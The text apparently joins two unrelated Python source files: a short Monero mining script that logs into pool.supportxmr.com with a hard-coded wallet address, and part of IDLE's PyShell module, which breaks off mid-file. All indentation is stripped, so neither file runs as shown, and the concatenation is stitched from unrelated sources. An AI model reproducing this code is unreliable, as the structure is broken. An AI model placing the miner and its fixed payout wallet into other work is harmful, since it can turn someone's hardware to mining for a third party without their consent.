# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import select
import binascii
import pycryptonight
import pyrx
import struct
import json
import sys
import os
import time
from multiprocessing import Process, Queue
pool_host = 'pool.supportxmr.com'
pool_port = 3333
pool_pass = 'wokrker-1'
wallet_address = '46ctPo673sfZiT1SCSKz8yGqvdgqYKaMUQM3Ur8jpjV6hSFRHN7QVq68qX1ywHdCZpKm1dSYt82oa9L2Q4ZZpSTyERd8JdG'
def main():
pool_ip = socket.gethostbyname(pool_host)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((pool_ip, pool_port))
q = Queue()
proc = Process(target=worker, args=(q, s))
proc.daemon = True
proc.start()
login = {
'method': 'login',
'params': {
'login': wallet_address,
'pass': pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
print('Logging into pool: {}:{}'.format(pool_host, pool_port))
s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
try:
while 1:
line = s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
if error:
print('Error: {}'.format(error))
continue
if result and result.get('status'):
print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
q.put(job)
elif method and method == 'job' and len(login_id):
q.put(params)
except KeyboardInterrupt:
print('{}Exiting'.format(os.linesep))
proc.terminate()
s.close()
sys.exit(0)
def pack_nonce(blob, nonce):
b = binascii.unhexlify(blob)
bin = struct.pack('39B', *bytearray(b[:39]))
bin += struct.pack('I', nonce)
bin += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
return bin
def worker(q, s):
started = time.time()
hash_count = 0
while 1:
job = q.get()
if job.get('login_id'):
login_id = job.get('login_id')
print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
print('New job with target: {}, RandomX, height: {}'.format(target, height))
else:
print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
target = struct.unpack('I', binascii.unhexlify(target))[0]
if target >> 32 == 0:
target = int(0xFFFFFFFFFFFFFFFF / int(0xFFFFFFFF / target))
nonce = 1
while 1:
bin = pack_nonce(blob, nonce)
if cnv > 5:
hash = pyrx.get_rx_hash(bin, seed_hash, height)
else:
hash = pycryptonight.cn_slow_hash(bin, cnv, 0, height)
hash_count += 1
sys.stdout.write('.')
sys.stdout.flush()
hex_hash = binascii.hexlify(hash).decode()
r64 = struct.unpack('Q', hash[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
print('{}Hashrate: {} H/s'.format(os.linesep, hr))
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
'id':1
}
print('Submitting hash: {}'.format(hex_hash))
s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([s], [], [], 3)
if not q.empty():
break
nonce += 1
if __name__ == '__main__':
main()
|
PyShell.py | #! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import exceptions
import linecache
from code import InteractiveInterpreter
from Tkinter import *
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Change warnings module to write to sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = sys.__stderr__
file.write(warnings.formatwarning(message, category, filename, lineno))
warnings.showwarning = idle_showwarning
def extended_linecache_checkcache(orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the pyshell#
entries, call the original linecache.checkcache(), and then restore the
saved entries. Assigning the orig_checkcache keyword arg freezes its value
at definition time to the (original) method linecache.checkcache(), i.e.
makes orig_checkcache lexical.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window when a shell is present"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: file list when a shell is present"
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.wakeup()
else:
self.pyshell = PyShell(self)
self.pyshell.begin()
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
None: idleConf.GetHighlight(theme, "normal"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, args[0], args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(" + `del_exitf` +")"
else:
command = "__import__('run').main(" + `del_exitf` + ")"
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
print>>sys.__stderr__,"IDLE socket error: " + err[1]\
+ ", retrying..."
else:
display_port_binding_error()
sys.exit()
self.spawn_subprocess()
# Accept the connection from the Python execution server
self.rpcclt.accept()
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
def restart_subprocess(self):
if self.restarting:
return
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
self.rpcclt.accept()
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
self.rpcclt.close()
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %s
del _sys
_msg = 'Use File/Exit or your end-of-file key to quit IDLE'
__builtins__.quit = __builtins__.exit = _msg
del _msg
\n""" % `sys.path`)
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, `what`
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
self.tkconsole.endexecuting()
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exceptiopn. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
sc = ScrolledCanvas(top, bg="white", highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input")
return
try:
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %s
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % `filename`)
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
try:
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
except:
self.showtraceback()
finally:
if not use_subprocess:
self.tkconsole.endexecuting()
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "_Shell"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
import __builtin__
__builtin__.quit = __builtin__.exit = "To exit, type Ctrl-D."
#
self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<beginning-of-line>>", self.home_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<open-python-shell>>", self.flist.open_shell)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
if use_subprocess:
self.interp.start_subprocess()
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response == False:
return "cancel"
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None
def interact(self):
self.begin()
self.top.mainloop()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
return ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if self.reading:
self.top.quit()
elif (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def home_callback(self, event):
if event.state != 0 and event.keysym == "Home":
return # <Modifier-Home>; fall back to class binding
if self.text.compare("iomark", "<=", "insert") and \
self.text.compare("insert linestart", "<=", "iomark"):
self.text.mark_set("insert", "iomark")
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]))
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]))
return "break"
# No stdin mark -- just get the current line, less any prompt
line = self.text.get("insert linestart", "insert lineend")
last_line_of_prompt = sys.ps1.split('\n')[-1]
if line.startswith(last_line_of_prompt):
line = line[len(last_line_of_prompt):]
self.recall(line)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s):
if self.history:
self.history.recall(s)
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile:
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
